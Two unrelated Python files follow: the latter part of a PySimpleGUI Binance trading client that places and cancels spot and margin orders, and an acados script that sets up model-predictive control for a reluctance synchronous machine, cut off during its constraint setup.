                # TODO: copy-trade forwarding not implemented here yet.
                print("Call COPYTRADE...")
            BU.errPrint(f'{windowTitle} - CONFIRMED!')
        elif eventML == sg.WIN_CLOSED or eventML == 'CANCEL':
            BU.errPrint(f'{windowTitle} - CANCELLED!')
            break
    windowML.close()
    del windowML
    del layoutML
    return True, "Ok"
def BS_SpotStopLimit(client, bgcolor = '', windowTitle = '', clientSide = 0) -> [ bool, str]:
    """Window loop to place spot stop-limit orders until the user closes it.

    Args:
        client: authenticated binance Client, forwarded to BO.orderSpotLimit().
        bgcolor: background color for the PySimpleGUI widgets and window.
        windowTitle: window title, also used as prefix in log messages.
        clientSide: order side, forwarded as sideOrd to BO.orderSpotLimit().

    Returns:
        [False, message] when an order submission fails (window is closed),
        [True, "Ok"] when the user cancels or closes the window.
    """
    layoutSSL = [
        [sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
        [sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
        [sg.Text('Stop Price: ', background_color = bgcolor), sg.InputText(key = '-STOP PRICE-')],
        [sg.Text('Limit Price: ', background_color = bgcolor), sg.InputText(key = '-LIMIT PRICE-')],
        [sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
        [sg.Button('SEND!'), sg.Button('CANCEL')],
    ]
    windowSSL = sg.Window(windowTitle, layoutSSL, background_color = bgcolor).Finalize()
    # The window stays open so several orders can be sent in sequence.
    while True:
        eventSSL, valuesSSL = windowSSL.read()
        if eventSSL == 'SEND!':
            BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesSSL['-SYMBOL-']}] Qtd: [{valuesSSL['-QTD-']}] Stop Prc: [{valuesSSL['-STOP PRICE-']}] Limit Prc: [{valuesSSL['-LIMIT PRICE-']}]")
            # Ask for confirmation; 'No' aborts this order only.
            if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
                BU.errPrint(f'{windowTitle} - CANCELLED!')
                continue
            ret, msgRet = BO.orderSpotLimit(client,
                                            symbOrd = valuesSSL['-SYMBOL-'],
                                            qtdOrd = valuesSSL['-QTD-'],
                                            prcStopOrd = valuesSSL['-STOP PRICE-'],
                                            prcStopLimitOrd = valuesSSL['-LIMIT PRICE-'],
                                            sideOrd = clientSide)
            if ret == False:
                sg.popup('ERRO! Order didnt post!')
                windowSSL.close()
                del windowSSL
                del layoutSSL
                return False, f"Eror posting order! {msgRet}"
            if valuesSSL['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
                # TODO: copy-trade forwarding not implemented here yet.
                print("Call COPYTRADE...")
            BU.errPrint(f'{windowTitle} - CONFIRMED!')
        elif eventSSL == sg.WIN_CLOSED or eventSSL == 'CANCEL':
            BU.errPrint(f'{windowTitle} - CANCELLED!')
            break
    windowSSL.close()
    del windowSSL
    del layoutSSL
    return True, "Ok"
def BS_SpotMarket(client, bgcolor = '', windowTitle = '', clientSide = 0) -> [bool, str]:
    """Window loop to place spot market orders until the user closes it.

    Args:
        client: authenticated binance Client, forwarded to BO.orderSpot().
        bgcolor: background color for the PySimpleGUI widgets and window.
        windowTitle: window title, also used as prefix in log messages.
        clientSide: order side, forwarded as sideOrd to BO.orderSpot().

    Returns:
        [False, message] when an order submission fails (window is closed),
        [True, "Ok"] when the user cancels or closes the window.
    """
    layoutSM = [
        [sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
        [sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
        [sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
        [sg.Button('SEND!'), sg.Button('CANCEL')],
    ]
    windowSM = sg.Window(windowTitle, layoutSM, background_color = bgcolor).Finalize()
    # The window stays open so several orders can be sent in sequence.
    while True:
        eventSM, valuesSM = windowSM.read()
        if eventSM == 'SEND!':
            BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesSM['-SYMBOL-']}] Qtd: [{valuesSM['-QTD-']}]")
            # Ask for confirmation; 'No' aborts this order only.
            if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
                BU.errPrint(f'{windowTitle} - CANCELLED!')
                continue
            ret, msgRet = BO.orderSpot(client,
                                       symbOrd = valuesSM['-SYMBOL-'],
                                       qtdOrd = valuesSM['-QTD-'],
                                       sideOrd = clientSide,
                                       typeOrd = Client.ORDER_TYPE_MARKET)
            if ret == False:
                sg.popup('ERRO! Order didnt post!')
                windowSM.close()
                del windowSM
                del layoutSM
                return False, f"Erro posting order! {msgRet}"
            if valuesSM['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
                # TODO: copy-trade forwarding not implemented here yet.
                print("Call COPYTRADE...")
            BU.errPrint(f'{windowTitle} - CONFIRMED!')
        elif eventSM == sg.WIN_CLOSED or eventSM == 'CANCEL':
            BU.errPrint(f'{windowTitle} - CANCELLED!')
            break
    windowSM.close()
    del windowSM
    del layoutSM
    return True, "Ok"
def BS_SpotLimit(client, bgcolor = '', windowTitle = '', clientSide = 0) -> [bool, str]:
    """Window loop to place spot limit orders until the user closes it.

    Args:
        client: authenticated binance Client, forwarded to BO.orderSpot().
        bgcolor: background color for the PySimpleGUI widgets and window.
        windowTitle: window title, also used as prefix in log messages.
        clientSide: order side, forwarded as sideOrd to BO.orderSpot().

    Returns:
        [False, message] when an order submission fails (window is closed),
        [True, "Ok"] when the user cancels or closes the window.
    """
    layoutSL = [
        [sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
        [sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
        [sg.Text('Price: ', background_color = bgcolor), sg.InputText(key = '-PRICE-')],
        [sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
        [sg.Button('SEND!'), sg.Button('CANCEL')],
    ]
    windowSL = sg.Window(windowTitle, layoutSL, background_color = bgcolor).Finalize()
    # The window stays open so several orders can be sent in sequence.
    while True:
        eventSL, valuesSL = windowSL.read()
        if eventSL == 'SEND!':
            BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesSL['-SYMBOL-']}] Qtd: [{valuesSL['-QTD-']}] Price: [{valuesSL['-PRICE-']}]")
            # Ask for confirmation; 'No' aborts this order only.
            if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
                BU.errPrint(f'{windowTitle} - CANCELLED!')
                continue
            ret, msgRet = BO.orderSpot(client,
                                       symbOrd = valuesSL['-SYMBOL-'],
                                       qtdOrd = valuesSL['-QTD-'],
                                       prcOrd = valuesSL['-PRICE-'],
                                       sideOrd = clientSide,
                                       typeOrd = Client.ORDER_TYPE_LIMIT)
            if ret == False:
                sg.popup('ERRO! Order didnt post!')
                windowSL.close()
                del windowSL
                del layoutSL
                return False, f"Erro posting order! {msgRet}"
            if valuesSL['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
                # TODO: copy-trade forwarding not implemented here yet.
                print("Call COPYTRADE...")
            BU.errPrint(f'{windowTitle} - CONFIRMED!')
        elif eventSL == sg.WIN_CLOSED or eventSL == 'CANCEL':
            BU.errPrint(f'{windowTitle} - CANCELLED!')
            break
    windowSL.close()
    del windowSL
    del layoutSL
    return True, "Ok"
def ListOpenOrders(client)->[bool, str]:
    """List open SPOT and MARGIN orders and optionally cancel the checked ones.

    Shows one checkbox per order (keyed by the stringified order id), then
    dispatches on the clicked button. Returns (False, msg) when a cancel
    request fails, (True, 'Ok') otherwise.
    """
    def buildOrderList(ordList):
        # One row per order: checkbox keyed by order id + fixed-font summary.
        return [sg.CBox(f"{ordList['orderId']}", key=f"{ordList['orderId']}"),
                sg.Text(f"{ordList['symbol']}\t\t{ordList['side']}\t\t{ordList['price']}\t\t{ordList['origQty']}\t\t{ordList['type']}", font=("Courier", 10))]
    try:
        openOrders = client.get_open_orders() #recvWindow
        openMarginOrders = client.get_open_margin_orders() #recvWindow
    except BinanceRequestException as e:
        return False, f"Erro at client.get_open_orders() BinanceRequestException: [{e.status_code} - {e.message}]"
    except BinanceAPIException as e:
        return False, f"Erro at client.get_open_orders() BinanceAPIException: [{e.status_code} - {e.message}]"
    except Exception as e:
        return False, f"Erro at client.get_open_orders(): {e}"
    if len(openOrders) == 0:
        layoutFrameSpotOpen = [[sg.Text("0 orders.", font=("Courier", 10))]]
    else:
        layoutFrameSpotOpen = [[sg.Text("Order Id\tSymbol\tSide\tPrice\tQtd\tType", font=("Courier", 10))]]
        [layoutFrameSpotOpen.append(buildOrderList(i)) for i in openOrders]
        layoutFrameSpotOpen.append([sg.Button('Delete Spot Order'), sg.Button('Copy Spot data to clipboard'), sg.Button('CopyTrade')])
    if len(openMarginOrders) == 0:
        layoutFrameMarginOpen = [[sg.Text("0 orders.", font=("Courier", 10))]]
    else:
        layoutFrameMarginOpen = [[sg.Text("Order Id\tSymbol\tSide\tPrice\tQtd\tType", font=("Courier", 10))]]
        [layoutFrameMarginOpen.append(buildOrderList(i)) for i in openMarginOrders]
        layoutFrameMarginOpen.append([sg.Button('Delete Margin Order'), sg.Button('Copy Margin data to clipboard'), sg.Button('CopyTrade')])
    layoutListOpenOrders = [
        [sg.Frame('SPOT', layoutFrameSpotOpen, title_color='blue')],
        [sg.Frame('MARGIN', layoutFrameMarginOpen, title_color='blue')],
        [sg.Button('Close')]
    ]
    windowListOpenOrder = sg.Window('Open Orders', layoutListOpenOrders)
    eventLOO, valuesLOO = windowListOpenOrder.read()
    del layoutFrameSpotOpen
    del layoutFrameMarginOpen
    if eventLOO == sg.WIN_CLOSED or eventLOO == 'Close':
        pass
    elif eventLOO == 'Delete Margin Order':
        BU.errPrint("Deleting margin orders:")
        # Checkbox keys are strings; the API returns integer order ids.
        for i in [str(k) for k, v in valuesLOO.items() if v == True]:
            for j2 in openMarginOrders:
                if j2['orderId'] == int(i):
                    ret, msgRet = BO.cancel_a_margin_order(client, symbOrd = j2['symbol'], ordrid = j2['orderId'])
                    if ret == False:
                        BU.errPrint(f"Erro canceling MARGIN order {j2['orderId']}! {msgRet}")
                        windowListOpenOrder.close()
                        del openOrders
                        del openMarginOrders
                        del windowListOpenOrder
                        del layoutListOpenOrders
                        return False, f"Erro canceling MARGIN order {j2['orderId']}! {msgRet}"
    elif eventLOO == 'Copy Margin data to clipboard':
        pass
    elif eventLOO == 'CopyTrade':
        # NOTE(review): both the spot and margin frames emit this same event
        # key, so the two buttons cannot be told apart; not implemented yet.
        pass
    elif eventLOO == 'Delete Spot Order':
        BU.errPrint("Deleting spot orders:")
        for i in [str(k) for k, v in valuesLOO.items() if v == True]:
            for j1 in openOrders:
                # BUG FIX: compare as int (was `== i`, a string, so spot
                # deletes never matched) and call the spot-cancel helper with
                # the spot order (was the garbled `cancel_a_BO.spot_order`
                # using the out-of-scope name `j2`, a NameError when reached).
                if j1['orderId'] == int(i):
                    ret, msgRet = BO.cancel_a_spot_order(client, symbOrd = j1['symbol'], ordrid = j1['orderId'])
                    if ret == False:
                        BU.errPrint(f"Erro canceling SPOT order {j1['orderId']}! {msgRet}")
                        windowListOpenOrder.close()
                        del openOrders
                        del openMarginOrders
                        del windowListOpenOrder
                        del layoutListOpenOrders
                        return False, f"Erro canceling SPOT order {j1['orderId']}! {msgRet}"
    elif eventLOO == 'Copy Spot data to clipboard':
        pass
    windowListOpenOrder.close()
    del openOrders
    del openMarginOrders
    del windowListOpenOrder
    del layoutListOpenOrders
    return True, 'Ok'
def main(argv):
    """GUI entry point: load config, connect to Binance, run the event loop."""
    STATUSBAR_WRAP = 100
    global cfgbnb
    cfgbnb.load()
    # API credentials: config file first, environment variables as fallback.
    binanceAPIKey = cfgbnb.get('BINANCE_APIKEY')
    if cfgbnb.get('BINANCE_APIKEY') == '':
        binanceAPIKey = getenv("BINANCE_APIKEY", "NOTDEF_APIKEY")
        if binanceAPIKey == "NOTDEF_APIKEY":
            BU.nmExitErro("Environment variable BINANCE_APIKEY not defined!")
    binanceSEKKey = cfgbnb.get('BINANCE_SEKKEY')
    if cfgbnb.get('BINANCE_SEKKEY') == '':
        binanceSEKKey = getenv("BINANCE_SEKKEY", "NOTDEF_APIKEY")
        if binanceSEKKey == "NOTDEF_APIKEY":
            BU.nmExitErro("Environment variable BINANCE_SEKKEY not defined!")
    if cfgbnb.get('BINANCE_RECVWINDOW') == '':
        # NOTE(review): read for completeness but currently unused below.
        binanceRecvWindow = int(getenv("BINANCE_RECVWINDOW", 5000))
    menu = [
        [ '&Menu', ['Info', 'Config', '---', 'Read cfg', 'Write cfg', 'Create Empty Cfg file', '---', 'Exit']],
        [ '&Account', ['Infos acc', 'Taxes']],
        [ '&Order', ['BUY', ['B Spot Market', 'B Spot Limit','B Spot Stop Limit', '!B Spot OCO', '---', 'B Margin Market', 'B Margin Limit', 'B Margin Stop Limit', '!B Margin OCO'],
                     'SELL', ['S Spot Market', 'S Spot Limit','S Spot Stop Limit', '!S Spot OCO', '---', 'S Margin Market', 'S Margin Limit', 'S Margin Stop Limit', '!S Margin OCO'], '!CANCEL', 'LIST or DELETE Open', '!LIST All']],
        [ '&Binance', ['Infos binance', 'Assets', 'Symbols']]
    ]
    # Left column: BUY buttons (green); right column: SELL buttons (red).
    # BUG FIX: the buy Margin OCO button key was the placeholder '<KEY>'.
    layout = [
        [sg.Menu(menu)],
        [sg.Button('Spot Market'      , key='BTTN_BSM' , button_color=('black','green'), size=(30,1)), sg.Button('Spot Market'      , key='BTTN_SSM' , button_color=('black', 'red'), size=(30,1))],
        [sg.Button('Spot Limit'       , key='BTTN_BSL' , button_color=('black','green'), size=(30,1)), sg.Button('Spot Limit'       , key='BTTN_SSL' , button_color=('black','red'), size=(30,1))],
        [sg.Button('Spot Stop Limit'  , key='BTTN_BSSL', button_color=('black','green'), size=(30,1)), sg.Button('Spot Stop Limit'  , key='BTTN_SSSL', button_color=('black','red'), size=(30,1))],
        [sg.Button('Spot OCO'         , disabled=True, key='BTTN_BSO' , button_color=('black','green'), size=(30,1)), sg.Button('Spot OCO'         , disabled=True, key='BTTN_SSO' , button_color=('black','red'), size=(30,1))],
        [sg.Button('Margin Market'    , key='BTTN_BMM' , button_color=('black','green'), size=(30,1)), sg.Button('Margin Market'    , key='BTTN_SMM' , button_color=('black','red'), size=(30,1))],
        [sg.Button('Margin Limit'     , key='BTTN_BML' , button_color=('black','green'), size=(30,1)), sg.Button('Margin Limit'     , key='BTTN_SML' , button_color=('black','red'), size=(30,1))],
        [sg.Button('Margin Stop Limit', key='BTTN_BMSL', button_color=('black','green'), size=(30,1)), sg.Button('Margin Stop Limit', key='BTTN_SMSL', button_color=('black','red'), size=(30,1))],
        [sg.Button('Margin OCO'       , disabled=True, key='BTTN_BMO' , button_color=('black','green'), size=(30,1)), sg.Button('Margin OCO'       , disabled=True, key='BTTN_SMO' , button_color=('black','red'), size=(30,1))],
        [sg.Button('LIST or DELETE Open', key='BTTN_LDOO')],
        [sg.Button('CLOSE', key='BTTN_CLOSE')],
        [sg.StatusBar('Last msg: Initialized', key='LASTMSG', size=(250, 3), justification='left')],
    ]
    BU.setConfirmationYES(True)
    # CONNECTING TO BINANCE
    try:
        client = Client(binanceAPIKey, binanceSEKKey, {"verify": True, "timeout": 20})
    except BinanceAPIException as e:
        BU.nmExitErro(f"Binance API exception: [{e.status_code} - {e.message}]")
    except BinanceRequestException as e:
        BU.nmExitErro(f"Binance request exception: [{e.status_code} - {e.message}]")
    except BinanceWithdrawException as e:
        BU.nmExitErro(f"Binance withdraw exception: [{e.status_code} - {e.message}]")
    except Exception as e:
        BU.nmExitErro(f"Binance connection error: {e}")
    sg.theme(cfgbnb.get('THEME'))
    #sg.set_options(suppress_raise_key_errors=False, suppress_error_popups=False, suppress_key_guessing=False)
    window = sg.Window('Binance Status GUI', layout, size = (600, 400)).Finalize()
    # Order dialogs, keyed by both the menu label and the button key.
    # BUG FIX: 'B Margin Market' previously opened a *sell* dialog
    # (('red', 'Sell Margin Limit', SIDE_SELL)); it now opens the buy dialog.
    # Also fixed the 'S Margin Market' window title (was 'Sell Margin Limit').
    orderActions = {}
    for keys, action in [
        (('B Spot Market',       'BTTN_BSM'),  (BS_SpotMarket,      'green', 'Buy Spot Market',        Client.SIDE_BUY)),
        (('B Spot Limit',        'BTTN_BSL'),  (BS_SpotLimit,       'green', 'Buy Spot Limit',         Client.SIDE_BUY)),
        (('B Spot Stop Limit',   'BTTN_BSSL'), (BS_SpotStopLimit,   'green', 'Buy Spot Stop Limit',    Client.SIDE_BUY)),
        (('B Margin Market',     'BTTN_BMM'),  (BS_MarginMarket,    'green', 'Buy Margin Market',      Client.SIDE_BUY)),
        (('B Margin Limit',      'BTTN_BML'),  (BS_MarginLimit,     'green', 'Buy Margin Limit',       Client.SIDE_BUY)),
        (('B Margin Stop Limit', 'BTTN_BMSL'), (BS_MarginStopLimit, 'green', 'Buy Margin Stop Limit',  Client.SIDE_BUY)),
        (('S Spot Market',       'BTTN_SSM'),  (BS_SpotMarket,      'red',   'Sell Spot Market',       Client.SIDE_SELL)),
        (('S Spot Limit',        'BTTN_SSL'),  (BS_SpotLimit,       'red',   'Sell Spot Limit',        Client.SIDE_SELL)),
        (('S Spot Stop Limit',   'BTTN_SSSL'), (BS_SpotStopLimit,   'red',   'Sell Spot Stop Limit',   Client.SIDE_SELL)),
        (('S Margin Market',     'BTTN_SMM'),  (BS_MarginMarket,    'red',   'Sell Margin Market',     Client.SIDE_SELL)),
        (('S Margin Limit',      'BTTN_SML'),  (BS_MarginLimit,     'red',   'Sell Margin Limit',      Client.SIDE_SELL)),
        (('S Margin Stop Limit', 'BTTN_SMSL'), (BS_MarginStopLimit, 'red',   'Sell Margin Stop Limit', Client.SIDE_SELL)),
    ]:
        for k in keys:
            orderActions[k] = action
    while True:
        event, values = window.read()
        if event == sg.WIN_CLOSED or event == 'Exit' or event == 'BTTN_CLOSE':
            break
        elif event == "Infos":
            sg.popup('INFOS')
        elif event in orderActions:
            dialog, color, title, side = orderActions[event]
            window.Hide()
            ret, msgRet = dialog(client, color, title, side)
            window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
            window.UnHide()
        elif event == 'Infos acc':
            window.Hide()
            ret, msgRet = printAccountInfo(client)
            window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
            window.UnHide()
        elif event == 'LIST or DELETE Open' or event == 'BTTN_LDOO':
            window.Hide()
            ret, msgRet = ListOpenOrders(client)
            window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
            window.UnHide()
        # All other menu entries (Info, Config, Taxes, OCO, CANCEL, LIST All,
        # Infos binance, Assets, Symbols, ...) are not implemented yet and
        # fall through as no-ops, as before.
    window.close()
if __name__ == '__main__':
    # Script entry point: run the GUI with the process argument vector.
    main(argv)
    exit(0)
|
#
# Copyright 2019 <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>
#
# This file is part of acados.
#
# The 2-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.;
#
from acados_template import *
import acados_template as at
import numpy as nmp
from ctypes import *
import matplotlib
import matplotlib.pyplot as plt
import scipy.linalg
import json
CODE_GEN = 1    # 1: generate the acados solver code
COMPILE = 1     # 1: compile the generated code via make
FORMULATION = 2 # 0 for hexagon 1 for sphere 2 SCQP sphere
# NOTE(review): the three reference values below are immediately overridden
# by the second set; the first assignments are dead/leftover.
i_d_ref = 1.484
i_q_ref = 1.429
w_val = 200
i_d_ref = -20   # d-axis current reference [A]
i_q_ref = 20    # q-axis current reference [A]
w_val = 300     # electrical speed parameter value
udc = 580       # DC-link voltage
u_max = 2/3*udc # maximum inverter voltage magnitude
# fitted psi_d map
def psi_d_num(x, y):
    """Fitted d-axis flux-linkage map psi_d(x=i_d, y=i_q).

    Generated by the Symbolic Math Toolbox version 8.0, 07-Feb-2018 23:07:49.
    Works on both numbers and CasADi symbols (only exp/atan are used).
    """
    linear_part = x*(-4.215858085639979e-3)
    saturation_part = exp(y**2*(-8.413493151721978e-5)) \
        * atan(x*1.416834085282644e-1) * 8.834738694115108e-1
    return linear_part + saturation_part
def psi_q_num(x, y):
    """Fitted q-axis flux-linkage map psi_q(x=i_d, y=i_q).

    Generated by the Symbolic Math Toolbox version 8.0, 07-Feb-2018 23:07:50.
    Works on both numbers and CasADi symbols (only exp/atan are used).
    """
    linear_part = y*1.04488335702649e-2
    saturation_part = exp(x**2*(-1.0/7.2e1))*atan(y)*6.649036351062812e-2
    return linear_part + saturation_part
# flux references corresponding to the current references
psi_d_ref = psi_d_num(i_d_ref, i_q_ref)
psi_q_ref = psi_q_num(i_d_ref, i_q_ref)
# compute steady-state u
Rs = 0.4  # stator resistance
u_d_ref = Rs*i_d_ref - w_val*psi_q_ref
u_q_ref = Rs*i_q_ref + w_val*psi_d_ref
def export_dae_model():
    """Build the implicit DAE model of the reluctance synchronous machine.

    Differential states are the flux linkages (psi_d, psi_q), controls the
    dq voltages (u_d, u_q), algebraic variables the dq currents (i_d, i_q)
    and parameters the electrical speed plus d/q disturbance terms.
    """
    # constants
    theta = 0.0352                    # NOTE(review): unused in this function
    Rs = 0.4                          # stator resistance
    m_load = 0.0                      # NOTE(review): unused in this function
    J = nmp.array([[0, -1], [1, 0]])  # NOTE(review): unused in this function
    # differential states: flux linkages
    psi_d = SX.sym('psi_d')
    psi_q = SX.sym('psi_q')
    # controls: dq voltages
    u_d = SX.sym('u_d')
    u_q = SX.sym('u_q')
    # algebraic variables: dq currents
    i_d = SX.sym('i_d')
    i_q = SX.sym('i_q')
    # state derivatives
    psi_d_dot = SX.sym('psi_d_dot')
    psi_q_dot = SX.sym('psi_q_dot')
    # parameters: speed and d/q disturbances
    w = SX.sym('w')
    dist_d = SX.sym('dist_d')
    dist_q = SX.sym('dist_q')
    # saturated flux map evaluated at the algebraic currents
    Psi = vertcat(psi_d_num(i_d, i_q), psi_q_num(i_d, i_q))
    # implicit dynamics: dq voltage equations plus flux consistency
    f_impl = vertcat(psi_d_dot - u_d + Rs*i_d - w*psi_q - dist_d,
                     psi_q_dot - u_q + Rs*i_q + w*psi_d - dist_q,
                     psi_d - Psi[0],
                     psi_q - Psi[1])
    model = acados_dae()
    model.f_impl_expr = f_impl
    model.f_expl_expr = []
    model.x = vertcat(psi_d, psi_q)
    model.xdot = vertcat(psi_d_dot, psi_q_dot)
    model.u = vertcat(u_d, u_q)
    model.z = vertcat(i_d, i_q)
    model.p = vertcat(w, dist_d, dist_q)
    model.name = 'rsm'
    return model
def export_voltage_sphere_con():
    """Nonlinear constraint h(x, u) = u_d**2 + u_q**2 (squared voltage norm)."""
    # states (only needed to declare the constraint's x argument)
    psi_d = SX.sym('psi_d')
    psi_q = SX.sym('psi_q')
    # controls
    u_d = SX.sym('u_d')
    u_q = SX.sym('u_q')
    constraint = acados_constraint()
    # voltage sphere
    constraint.expr = u_d**2 + u_q**2
    constraint.x = vertcat(psi_d, psi_q)
    constraint.u = vertcat(u_d, u_q)
    constraint.nc = 1
    constraint.name = 'v_sphere'
    return constraint
def export_nonlinear_part_voltage_constraint():
    """Inner (nonlinear-part) expression (u_d, u_q) for the SCQP voltage
    constraint formulation."""
    # states (only needed to declare the constraint's x argument)
    psi_d = SX.sym('psi_d')
    psi_q = SX.sym('psi_q')
    # controls
    u_d = SX.sym('u_d')
    u_q = SX.sym('u_q')
    constraint = acados_constraint()
    constraint.expr = vertcat(u_d, u_q)
    constraint.x = vertcat(psi_d, psi_q)
    constraint.u = vertcat(u_d, u_q)
    constraint.nc = 2
    constraint.name = 'v_sphere_nl'
    return constraint
def get_general_constraints_DC(u_max):
    """Hexagonal inverter-voltage constraint as general constraints + bounds.

    Returns a dict with D, C, lg, ug (lg <= D*u + C*x <= ug, column-major as
    expected by the acados C interface) and the simple bounds lbu, ubu on u_q.
    """
    r = u_max
    # two adjacent hexagon corners
    x1, y1 = r, 0
    x2, y2 = r*cos(pi/3), r*sin(pi/3)
    # slanted edges: q1 <= uq + m1*ud <= -q1 and q1 <= uq - m1*ud <= -q1
    q1 = -(y2 - y1/x1*x2)/(1-x2/x1)
    m1 = -(y1 + q1)/x1
    # horizontal edges as box constraints: -q2 <= uq <= q2
    q2 = r*sin(pi/3)
    return {
        "D": nmp.array([[m1, 1], [-m1, 1]]),
        "C": nmp.transpose(nmp.array([[0, 0], [0, 0]])),
        "lg": nmp.array([+q1, +q1]),
        "ug": nmp.array([-q1, -q1]),
        "lbu": nmp.array([-q2]),
        "ubu": nmp.array([+q2]),
    }
# create render arguments
ra = acados_ocp_nlp()
# export model
model = export_dae_model()
# export constraint description
constraint = export_voltage_sphere_con()
constraint_nl = export_nonlinear_part_voltage_constraint()
# set model_name
ra.model_name = model.name
if FORMULATION == 1:
    # constraints name
    ra.con_h_name = constraint.name
if FORMULATION == 2:
    # constraints name
    ra.con_h_name = constraint.name
    ra.con_p_name = constraint_nl.name
# sampling time [s]
# Ts = 0.0016
# Ts = 0.0012
Ts = 0.0008
# Ts = 0.0004
# problem sizes read back from the model
nx = model.x.size()[0]   # differential states
nu = model.u.size()[0]   # controls
nz = model.z.size()[0]   # algebraic variables
np = model.p.size()[0]   # parameters (numpy is imported as nmp, so no clash)
ny = nu + nx             # outputs in the stage least-squares cost
ny_e = nx                # outputs in the terminal cost
N = 2                    # horizon length (stages)
Tf = N*Ts                # prediction horizon [s]
# set ocp_nlp_dimensions
nlp_dims = ra.dims
nlp_dims.nx = nx
nlp_dims.nz = nz
nlp_dims.ny = ny
nlp_dims.ny_e = ny_e
nlp_dims.nbx = 0
nlp_dims.nbu = 1
# per-formulation constraint dimensions (general / nonlinear h / SCQP)
if FORMULATION == 0:
    nlp_dims.nbu = 1
    nlp_dims.ng = 2
if FORMULATION == 1:
    nlp_dims.ng = 0
    nlp_dims.nh = 1
if FORMULATION == 2:
    nlp_dims.ng = 2
    nlp_dims.npd = 2
    nlp_dims.nh = 1
nlp_dims.nh_e = 0
# nlp_dims.nbu = 2
# nlp_dims.ng = 2
# nlp_dims.ng = 0
nlp_dims.ng_e = 0
nlp_dims.nbx_e = 0
nlp_dims.nu = nu
nlp_dims.np = np
nlp_dims.N = N
# nlp_dims.npd_e = -1
# nlp_dims.nh = 1
# set weighting matrices
nlp_cost = ra.cost
# stage weights: track the flux references (states) and penalize voltages
Q = nmp.eye(nx)
Q[0,0] = 5e2*Tf/N
Q[1,1] = 5e2*Tf/N
R = nmp.eye(nu)
R[0,0] = 1e-4*Tf/N
R[1,1] = 1e-4*Tf/N
# R[0,0] = 1e1
# R[1,1] = 1e1
nlp_cost.W = scipy.linalg.block_diag(Q, R)
# output selection: y = Vx*x + Vu*u + Vz*z
Vx = nmp.zeros((ny, nx))
Vx[0,0] = 1.0
Vx[1,1] = 1.0
nlp_cost.Vx = Vx
Vu = nmp.zeros((ny, nu))
Vu[2,0] = 1.0
Vu[3,1] = 1.0
nlp_cost.Vu = Vu
# algebraic variables do not enter the cost (zero selection matrix)
Vz = nmp.zeros((ny, nz))
Vz[0,0] = 0.0
Vz[1,1] = 0.0
nlp_cost.Vz = Vz
# terminal cost on the flux states only
Q_e = nmp.eye(nx)
Q_e[0,0] = 1e-3
Q_e[1,1] = 1e-3
nlp_cost.W_e = Q_e
Vx_e = nmp.zeros((ny_e, nx))
Vx_e[0,0] = 1.0
Vx_e[1,1] = 1.0
nlp_cost.Vx_e = Vx_e
# references: flux linkages followed by the steady-state dq voltages
nlp_cost.yref = nmp.zeros((ny, ))
nlp_cost.yref[0] = psi_d_ref
nlp_cost.yref[1] = psi_q_ref
nlp_cost.yref[2] = u_d_ref
nlp_cost.yref[3] = u_q_ref
nlp_cost.yref_e = nmp.zeros((ny_e, ))
nlp_cost.yref_e[0] = psi_d_ref
nlp_cost.yref_e[1] = psi_q_ref
# get D and C
res = get_general_constraints_DC(u_max)
D = res["D"]
C = res["C"]
lg = res["lg"]
ug = res["ug"]
lbu = res["lbu"]
ubu = res["ubu"]
# setting bounds
# lbu <= u <= ubu and lbx <= x <= ubx
nlp_con = ra.constraints
# nlp_con.idxbu = nmp.array([0, 1])
# nlp_con.lbu = nmp.array([-u_max, -u_max])
# nlp_con.ubu = nmp.array([+u_max, +u_max])
# simple bound only on u_q (input index 1)
